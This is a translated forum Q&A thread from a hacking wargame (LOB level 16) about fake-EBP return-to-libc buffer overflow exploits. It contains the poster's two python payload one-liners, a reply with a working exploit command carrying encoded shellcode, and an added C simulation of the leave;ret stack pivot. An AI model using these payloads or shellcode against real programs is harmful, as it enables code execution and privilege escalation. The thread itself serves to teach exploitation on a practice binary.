Level Hacking

   incaro
   [LOB] LEVEL16 - Question about the FAKE EBP problem.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3216


━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1) Setting the FAKE EBP to the start address of the buffer and doing RTL succeeds.
[ "AAAA" ] + [system()] + [exit()] + ["/bin/sh"] + [NOP*24] + [fake ebp:(buffer)] + [leave;ret]
--------------------------------------------------------------------------------------------------------------
$(python -c 'print "AAAA" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "\x90"*24 + "\xb0\xfa\xff\xbf" + "\x32\x85\x04\x08"')
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
2) Setting the FAKE EBP to argv[2] and doing RTL fails.
ARGV[1]::([ "D"*40 ] + [fake ebp:(argv[2])] + [leave;ret])  
ARGV[2]::(["AAAA"] + [system()] + [exit()] + ["/bin/sh"])
--------------------------------------------------------------------------------------------------------------
$(python -c 'print "D"*40 + "\x48\xfc\xff\xbf" + "\x32\x85\x04\x08"') $(python -c 'print "AAAA" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
※ (The leave;ret address above is the address in the copy.)

※ No. 1 works and No. 2 does not. (When the address is wrong a Segmentation fault occurs, but there is no error either.)
I don't know why.

  Hit : 2953     Date : 2011/06/11 07:18



    
멍멍 I'll answer this one tomorrow too~ It's gotten too late~~ 2011/07/04  
멍멍 In a case like this, attach gdb and follow the code flow instruction by instruction to find the problem! 2011/07/06  
멍멍 For reference, this is the payload I used. I used argv[2] as well~

./zombie_assassin `perl -e 'printf "\xe7\xfb\xff\xbf"x10 . "\xb0\xfb\xff\xbf" . "\xdf\x84\x04\x08"'` `perl -e 'printf "\x90"x50 . "\xb8\xb8\x91\x2e\x55\x31\xc9\xd9\xc3\xd9\x74\x24\xf4\xb1\x0b\x5d\x31\x45\x13\x03\x45\x13\x83\xed\xfc\xe2\x4d\xfb\x25\x0d\x34\xae\x5f\xc5\x6b\x2c\x29\xf2\x1b\x9d\x5a\x95\xdb\x89\xb3\x07\xb2\x27\x45\x24\x16\x50\x5d\xab\x96\xa0\x71\xc9\xff\xce\xa2\x7e\x97\x0e\xea\xd3\xee\xee\xd9\x54"'`

\xb8\xb8 .... is ordinary shellcode.
2011/07/06  
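
The two `leave; ret` epilogues that layout 1 depends on, modelled over a toy stack. This is an added example, not code from anyone in the thread. It uses only the addresses quoted in layout 1 and assumes the 40-byte buffer sits directly below the saved EBP; `trace_pivot`, `struct landing` and the memory window are hypothetical names.

```c
#include <stdint.h>
#include <stdio.h>

/* Values quoted in layout 1 of the post; the 40-byte buffer directly below
   saved EBP is an assumption taken from the payload lengths. */
#define BUF      0xbffffab0u  /* buffer start, used as fake EBP */
#define SYSTEM_A 0x40058ae0u
#define EXIT_A   0x400391e0u
#define BINSH_A  0x400fbff9u
#define GADGET   0x08048532u  /* leave; ret */

#define BASE 0xbffffa00u      /* constructed toy stack window */
static uint32_t mem[256];
static uint32_t *at(uint32_t a) { return &mem[((a - BASE) / 4) % 256]; }

struct cpu { uint32_t esp, ebp, eip; };
/* leave = mov esp, ebp ; pop ebp      ret = pop eip */
static void leave(struct cpu *c) { c->esp = c->ebp; c->ebp = *at(c->esp); c->esp += 4; }
static void ret(struct cpu *c)   { c->eip = *at(c->esp); c->esp += 4; }

struct landing { uint32_t eip, ebp, ret_addr, arg; };

/* Write layout 1 at BUF, then run the function's own epilogue followed by
   the leave;ret that the overwritten return address points to. */
struct landing trace_pivot(uint32_t fake_ebp) {
    uint32_t words[12] = { 0x41414141u, SYSTEM_A, EXIT_A, BINSH_A,
        0x90909090u, 0x90909090u, 0x90909090u, 0x90909090u, 0x90909090u,
        0x90909090u, fake_ebp /* saved EBP slot */, GADGET /* saved EIP slot */ };
    for (int i = 0; i < 12; i++) *at(BUF + 4u * i) = words[i];

    struct cpu c = { 0, BUF + 40, 0 };  /* EBP points at the saved-EBP slot */
    leave(&c); ret(&c);                 /* epilogue 1: EBP = fake_ebp, EIP = GADGET */
    if (c.eip == GADGET) { leave(&c); ret(&c); }  /* epilogue 2: ESP = fake_ebp */
    struct landing r = { c.eip, c.ebp, *at(c.esp), *at(c.esp + 4) };
    return r;
}

int main(void) {
    struct landing ok = trace_pivot(BUF), off = trace_pivot(BUF + 4);
    printf("fake ebp = buf   : eip=%08x ret=%08x arg=%08x\n",
           (unsigned)ok.eip, (unsigned)ok.ret_addr, (unsigned)ok.arg);
    printf("fake ebp = buf+4 : eip=%08x\n", (unsigned)off.eip);
    return 0;
}
```

The second `leave` pops the dword at the fake EBP (the "AAAA" filler) and the following `ret` pops the dword 4 bytes after it, so a fake EBP that is off by one dword transfers control to a different word of the same layout.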